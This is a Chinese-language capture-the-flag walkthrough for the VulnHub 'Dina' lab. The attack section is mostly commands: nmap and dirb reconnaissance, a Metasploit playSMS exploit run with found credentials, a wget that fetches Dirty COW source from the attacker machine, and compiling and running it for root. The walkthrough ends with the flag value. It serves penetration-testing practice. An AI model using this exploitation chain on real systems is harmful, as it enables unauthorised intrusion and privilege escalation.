一、vulnhub简介
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。
每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
vulnhub官网地址:Vulnerable By Design ~ VulnHub
二、Dina靶场环境配置
1、靶场环境下载
Dina靶场环境详情页面:Dina: 1.0.1 ~ VulnHub

页面往下翻,找到Download-->Download (Mirror)

- Download (Mirror): https://download.vulnhub.com/dina/Dina-1-0-1.ova
2、靶场文件导入
打开VMware,在主界面点击“打开虚拟机”

在打开界面,找到刚才下载好的ova格式虚拟机文件

在导入界面为虚拟机命名及存储路径设置
如果导入失败,点击重新导入

三、Dina靶场渗透
1、准备
kali-Linux*1、Dina*1
(两台虚拟机均为NAT模式或者均为桥接模式)
kali开启apache服务,并将脏牛提权源文件复制到apache的相关路径下:
※重新打开一个root权限的terminal终端:
※脏牛提权C语言源文件下载路径:GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
※将脏牛提权的C语言源文件复制到/var/www/html/目录下:cp /home/kali/下载/dirty.c /var/www/html/dirty.c
※切换路径到apache服务相关的目录下:cd /var/www/html/
※赋权给dirty.c:chmod 777 dirty.c
※启动kali的apache服务:systemctl start apache
2、渗透目标
获取目标主机中的flag值(/root/flag.txt)
3、过程
(1)、信息收集
使用nmap进行操作系统版本探测扫描:nmap -O -sV 192.168.107.0/24

上图中的5个存活IP中,其中192.168.107.1是默认网关,192.168.107.2是某个虚拟机网络配置(如VMware-Tools),192.168.107.254是子网中的广播地址(有特殊用途),使用ifconfig命令查看kali的IP为192.168.107.151,由于192.168.107.150的操作系统为Ubuntu,很显然这个IP就是靶机了,而且还开放了80端口http服务
发现目标后,对目标主机的80端口http服务进行访问,结果如下图:

80端口可以正常访问web应用http服务
网站浏览了半天啥都没有发现,使用kali自带的网站目录扫描工具dirb进行扫描:dirb http://192.168.107.150/
发现了以上截图中的目录,逐个进行访问和源代码审计发现robots目录中有未扫描出来的目录 (nothing、angel、...),secure目录中有个backup的压缩文件,果断下载


对robots目录中的目录进行逐一访问与源代码审计,发现其中的nothing目录并不是真的404 NOT FOUND:


发现里面有一份密钥,果断保存
源代码审计完后,打开刚才发现的压缩文件,发现竟然加密了,用刚才发现的密钥逐一尝试,发现竟然有一个是对的:freedom!!!(事实上的我:第一次打靶场,竟然天真的用john破解的密码)

打开文件后,发现里面是一份mp3文件,发现正常的mp3打不开,只能使出万能的记事本了!!!


发现里面居然有一个目录、账户名,使用浏览器试试

意外之喜,有个web应用,那想必mp3文件里的name应该是username了,死马当活马医,使用刚才发现的密钥试试,amazing!!!(username:touhid;password:diana)
发现主界面挺简洁的(啥都没有!)

(2)、漏洞相关信息收集及利用
既然是playsms,那就使用MSF搜一下看看有没有什么漏洞吧(如果你很牛逼的话可以试试任意文件上传拿下shell)
MSF启动:msfconsole
搜索可用漏洞模块:search playsms
使用第三个模块(编号为2):use 2
设置攻击参数:
set rhosts 192.168.107.150 #Dina IP(目标IP)
set targeturi /SecreTSMSgatwayLogin #目标URL
set lhost 192.168.107.151 #kali IP(攻击者IP)
set username touhid #目标IP的目标URL的登录用户名
set password diana #目标IP的目标URL的登录密钥、口令
查看参数设置情况:show options


开始攻击:run
启动标准shell:python -c 'import pty; pty.spawn("/bin/bash")'
切换到靶机有权限的目录下:cd /tmpwget下载脏牛提权文件:wget http://192.168.107.151/dirty.c
在靶机中编译脏牛提权C语言源文件:gcc -pthread dirty.c -o dirty -lcrypt
运行脏牛提权脚本:./dirty new-password



(3)、获取flag值

FLAG值:22d06624cd604a0626eb5a2992a6f2e6
至此,便结束了!
希望我的以上步骤可以为大家带来帮助!


被折叠的 条评论
为什么被折叠?



